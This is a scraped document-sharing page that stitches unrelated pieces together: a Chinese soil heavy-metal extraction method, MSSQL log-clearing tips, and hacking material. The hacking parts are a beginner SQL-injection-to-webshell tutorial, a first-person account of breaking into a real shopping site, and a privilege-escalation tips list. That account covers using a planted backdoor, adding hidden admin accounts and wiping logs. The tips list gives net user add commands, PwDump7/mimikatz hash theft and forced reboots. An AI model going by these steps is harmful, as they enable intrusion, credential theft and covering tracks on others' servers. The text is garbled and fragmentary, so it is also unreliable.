冰醋酸(17.4mol/L,原液)和0.82ml浓HNO3(15.8mol/L),用水定容至1L,摇匀后储存于塑料瓶中备用,此溶液pH值为2.5±0.1。称取5.00g风干土样(过2mm筛)于100ml塑料瓶中,加入50.00ml M3提取剂,在25±1℃的恒温条件下振荡,振速为200r/min,振荡5min后过滤,滤液承接于干燥的塑料瓶中,用原子吸收分光光度计测定滤液中的铜锌铁锰. 3.美国环境保护部TCLP(Toxicity Characteristic Leaching)法:取1g过10目筛的盆栽土加入离心管中,再加20ml提取剂(土:水比1:20),震荡18小时,0.45um滤纸过滤,AAS测定重金属Cu含量。 提取剂的配制:加5.7ml冰醋酸和64.3ml1mol/lNaOH于500ml去离子水中,定容至1000ml容量瓶,溶液pH4.39±0.05 TCLP法是现在美国法庭所通用的生态环境风险评价方法(Chang E,2001;Bilge A,2002)。此法评价重金属生态环境风险在美国已经开展研究多年,是美国

几种清除MSSQL日志方法

方法一、 1 / 4

2 / 4 方法二、

MS SQL清除日志的命令 如何清除sql server 日志? 设置数据库为简单模式,自动收缩 1.打开查询分析器,输入命令 backup log databasename with no_log 2.再打开企业管理器--右键你要压缩的数据库--所有任务--收缩数据库--收缩文件--选择日志文件--在收缩方式里选择收缩至XXM,这里会给出一个允许收缩到的最小M 数,直接输入这个数,确定就可以了。 dbcc shrinkfile (databasename_log,truncateonly) 方法三、 1: 删除LOG 第1步:分离数据库企业管理器->服务器->数据库->右键->分离数据库 第2步:删除LOG文件 第3布:附加数据库企业管理器->服务器->数据库->右键->附加数据库 此法生成新的LOG,大小只有500多K 再将此数据库设置自动收缩 方法四、 EXEC sp_detach_db @dbname = 'pubs' EXEC sp_attach_single_file_db @dbname = 'pubs', @physname = 'c:\Program Files\Microsoft SQL Server\MSSQL\Data\pubs.mdf' 方法五、 Use Database_Name Backup Log Database_Name With No_log dbcc shrinkfile (Database_Name_Log,truncateonly) Go 方法六、 直接在查询分析那里执行backup log databasename with no_log 然后回到企业管理器把数据库收缩一下(可能需另外设置属性) 3 / 4

(零基础)手工注入+burpsuite拿webshell

之前由于不会安装vm版的bt5而在网上求救,结果认识了一找不到片的基友,00后的,,感觉顿时无语了…………聊天时,他说sqlmap 和burpsuite都很强大…………玩完sqlmap后,就一直想学burpsuite来着,,但是一直都没学,这几天才刚开始完的…………感觉确实强大,能够拦截,查看和修改网站流量………………不废话,开始 目标站,https://www.wendangku.net/doc/45159094.html,(不要问我怎么找的……百度高级搜索inurl:asp?id=XX) 点一链接,在网站后加 and 1=1 回车,页面正常,,加and 1=2 ,回车,不正常,,,判断存在sql 注入漏洞(当然存在啊,不然怎么做教程,只是说下如何判断注入) 然后order by 查询字段(是叫做字段吗,我对概念不清楚,虽然我为这还自学了mysql……暂且叫字段吧) 如图,12不正常,11正常,说明字段为11(11之前的都正常)

然后在地址后加入 union select 1,2,3,4,5,6,7,8,9,10,11 from admin,也就是访问 https://www.wendangku.net/doc/45159094.html,/show_content.asp?id=1361 union select 1,2,3,4,5,6,7,8,9,10,11 from admin(别问我admin哪来的,,微软access数据库默认的表,也不能说是默认的吧,大多都是这样,下面的username和password也是这样),看图吧 看到2 3 没,爆出查询点了,,把2换成username,3换成password(当然2换成password,3为username也行),回车,如图 username为admin,,密码为MD5加密的值,拿去解密,如图

一次简单但又完整的先拿shell后提权的经历

. 一次简单但又完整的先拿shell后提权的经历 前一段时间看到了易趣购物网站爆出了注入漏洞,注入的关键字是关键字: inurl:Price.asp?anid=,结合系统本身的后台数据库备份生成目录可以自定义漏洞,轻松可以通过备份xxx.asp的目录,然后上传后缀为jpg的一句话木马,菜刀连之即可得到shell。 但是如果是这样我也不会再写此文,在这些购物网站中,数据最重要的当属减肥丰胸等等网站数据,而且这些网站在优化seo时,肯定设置的关键字也是减肥丰胸之类,那么中文标题之中必有此关键字,那我的想法就产生了,我的新的注入关键字产生了nurl:Price.asp?anid= intitle:减肥。 啊d扫描注入点,找到一个注入点https://www.wendangku.net/doc/45159094.html,/Price.asp?anid=xxx,拿去跑表段字段即可,不过也得注意表段是特有的Cnhww。我一般在渗透的时候,也会用jsky和御剑检测站点,在我查看御剑的结果时发现了一个让我欣喜的结果https://www.wendangku.net/doc/45159094.html,/shell.asp,明白的一看便知是先人后门,打开发现是一个小马, (原有小马一被我清除,此图是后来补的),复制大马代码保存,即得到shell。 扫描端口发现,网站开启了

连接3389端口发现可以连接, 尝试简单的命令猜解失败后,决定重新利用shell。查看服务器所支持的组件:

发现可以支持fso和wscript.shell,欣喜往外,ipconfig,net user都支持,查看了当前的账户,有一个默认的administrator管理账户。但是net user admin admin /add,没任何反应,net user 发现并没有添加账户成功,这里很纳闷,决定换思路。把网站翻了个遍,发现了一个数据库的链接文件。 通过代码可知,这里数据库使用了acess和mssql两个,mssql数据库连接账号和密码都已知晓,何不利用数据库连接器试一试,然后兴奋的分别用了MSSQL连接器、SQLTools、SQL查询分析器分离版本,但皆以失败而告终,都拒绝连接不上,看来是防火墙对1433端口做了从外到内的限制,悲哀。。。 就在这个时候,忽然想起来,啊d等软件在mssql数据库sa权限下,皆有列目录和执行dos的权限,何不试试,然后用啊d 执行命令net user admin admin /add & net localgroup administrators admin /add,但是好久都没回显,很卡的样子,就又换了hdsi,一举成功。 注意这里建立admin是为了方便检测新否已经建立账户,要做一个好的后门,是要做克隆账户的。心情愉悦的3389连之,为了防止管理员net user查到新建的账户,我建立了隐藏账户,即是admin$,这种账户在cmd中时发现不了的,但是查询用户组还是一览无遗。我当时没在意觉得没什么,然后速度在日志查看器中删除了所有日志,(这个我也不想,不过好似没法删除单一的登陆记录,请大牛指点指点),正在这时,忽然事件查看器中多了一条登录审核信息,我一看管理员来了,吓得我急忙注销电脑,灰溜溜的跑了。。。。 大约过了1个小时吧,我又重新登录,账号还在,管理员确实很马虎额,不过自己可不能再大意了,遂决定建立克隆账户。 然后就用shell上传aio.exe文件,竟然失败,然后用菜刀上传也是失败,真是无语。看来是权限不够,忽然想到3389现在不是支持复制粘贴吗?忽然觉得思路就是被逼出来的,

渗透测试资料--提权技巧

### 提权技巧 1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是https://www.wendangku.net/doc/45159094.html, cmd.txt cmd.rar等 https://www.wendangku.net/doc/45159094.html, user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上 传一个net.exe 3.cmd执行exp没回显的解决方法:com路径那里输入exp路径 C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入net user jianmei daxia /add 4.有时候因为监控而添加用户失败,试试上传抓取hash的工具,如PwDump7.exe,得到hash之后可以进行破解,建议重定向结果到保存为1.txt cmd /c c:\windows\temp\cookies\PwDump7.exe >1.txt,在条件允许的情况下 也可以用mimikatz直接抓明文 5.有时候权限很松,很多命令都可以执行,但是就是增加不上用户,这时候你就要考虑是不是因为密码过于简单或是过于复杂了 6.用wt.asp扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输 入替换的文件路径,下面清空双引号加增加用户的命令 7.有时候可以添加用户,但是添加不到管理组,有可能是administrators组改名 了,使用命令net user administrator查看管理组的名字 8.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:"c:\xxx\exp.exe whoami” 记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那里,下面不变 9.当添加不上用户却可以添加“增加用户的Vbs、bat)的时候,就添加一个吧,然后 用“直接使服务器蓝屏重启的东东”让服务器重启就提权成功 10.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setp c:\windows\temp\cmd.exe 设置终端路径为:c:\windows\temp\cmd.exe 11.支持aspx但跨不了目录的时候,可以上传一个读iis的vbs,执行命令列出所有网站目录,找到主站的目录就可以跨过去了,上传cscript.exe到可执行目录, 接着上传iispwd.vbs到网站根目录,cmd命令cmd /c “c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs 11.如何辨别服务器是不是内网?192.168.x.x 172.16.x.x 10.x.x.x 12.安全狗下加用户的语句::for /l %i in (1,1,1000) do @net user test test [/add&@net]() localgroup administrators test /add

相关文档